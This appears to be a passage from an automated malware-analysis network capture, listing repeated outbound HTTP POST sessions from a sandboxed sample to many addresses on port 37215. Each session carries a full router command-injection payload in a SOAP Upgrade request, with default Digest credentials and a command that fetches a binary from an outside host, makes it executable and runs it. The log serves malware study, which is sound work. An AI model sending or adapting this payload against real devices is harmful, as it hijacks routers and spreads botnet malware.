                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1524192.168.2.156098641.57.30.19337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107980013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1525192.168.2.154567841.146.201.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107980013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1526192.168.2.154975641.232.118.1437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108023882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1527192.168.2.156084241.241.187.21337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108028889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1528192.168.2.156039241.226.209.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108028889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1529192.168.2.155897441.59.59.3037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108032942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1530192.168.2.154835041.39.51.18337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108042002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1531192.168.2.155377841.98.43.7037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108102083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1532192.168.2.154536641.177.244.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108105898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1533192.168.2.154790641.90.2.7437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108105898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 